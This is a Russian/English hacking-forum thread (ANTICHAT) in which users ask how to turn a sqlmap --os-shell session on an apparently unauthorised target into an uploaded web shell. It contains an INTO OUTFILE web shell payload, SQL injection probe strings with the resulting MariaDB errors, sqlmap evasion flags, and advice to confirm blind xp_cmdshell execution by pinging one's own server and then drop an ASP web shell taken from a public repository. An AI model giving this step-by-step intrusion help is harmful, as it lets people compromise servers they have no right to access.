ANTICHAT — форум по информационной безопасности, OSINT и технологиям

noppathee said:
↑
sqlmap с параметром --os-shell такой результат:
os-shell> whoami
do you want to retrieve the command standard output? [Y/
[11:11:38] [INFO] retrieved: nt authority\network servic
command standard output: 'nt authority\network service'
os-shell>
Подскажите нубу плз, как дальше действовать, чтобы залить шелл через sqlmap?
Нашел в теме рекомендацию от BigBear по похожему вопросу: select '' into outfile '/[full_path]/x.php';
Но как узнать конечную директорию, в которую заливаться?
Спасибо!

DezMond™ said:
↑
help!

man474019 said:
↑
in target when try sleep() target loads and gives response 504 Gateway Time-out, also tested sleep(5), sleep(10) and etc.., same result (504)
scanners detects it sql injection, but sqlmap not
what means it vuln ? thanks in advance
p.s server is nginx

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''' LIMIT 2' at line 1

' order by 6#

Unknown column '6' in 'order clause'

The used SELECT statements have a different number of columns

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '
+select+1,2,3
' LIMIT 2' at line 1

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''
LIMIT 2
' at line 1

[13:56:51] [ERROR] invalid character detected. retrying..
[13:58:23] [ERROR] unable to properly validate last character value ('2')..

--tamper=between --random-agent --time-sec=10 --delay=5 --sql-shell --hex

BabaDook said:
↑
sqlmap --os-shell -> 4 -> 2 итд

BabaDook said:
↑
Ты вообще уверен что прав хватит?
если есть права,то один расклад, если нету, то другой. вообщем смотреть надо.

man474019 said:
↑
try --current-user --is-dba
and see response true or false ? if false there're no variants for uploading shell via sqli/sqlmap

noppathee said:
↑
Нагуглить дальнейший метод действий не получилось. Подскажите плз, как дальше действовать или ткните в мануал какой-нибудь?

noppathee said:
↑

Baskin-Robbins said:
↑
Давайте смотреть что мы имеем и пытаться понять как нам действовать.

1. Слепая инъекция
   
2. Ос винда
   
3. Субд mssql
   
4. Текущий юзер DBA

Sqlmap нам явно говорит что xp_cmdshell без вывода в строке "unable to retrieve xp_cmdshell output"
Следовательно результат выполнения команды мы увидеть не можем.
Но для начала я бы рекомендовал вам ознакомится с sql синтаксисом, проведением sql инъекций и проведением sql инъекций в mssql в частности, если вы не знакомы.
Это даст понимание того что происходит и что делать дальше. Найти это можно как в гугле так и воспользовавшись поиском на форуме, ниже линк на sql inj в mssql, ну одна из статей на форуме.
/threads/30501/
Идем дальше. Несмотря на то что вывод в данном случае отсутствует, команды все равно могут выполнятся. Самый простой способ это проверить - команда ping
и смотреть в логах вашего сервера. Или сразу лить шелл в папку доступную из вне. О том какой командой лить есть по линку выше, либо воспльзовавшись гуглом можно
найти список команд командной строки, или запустить если у вас винда cmd.exe и забить команду help.
Следующий момент - asp. Ну я думаю вы понимаете что если используется asp, то и лить надо asp шелл. Такой можно найти по линку ниже, но надо быть осторожным - есть пробэкдореные.
https://github.com/tennc/webshell
Вот примерно куда вам нужно двигаться. Ну я бы во всяком случае двигался.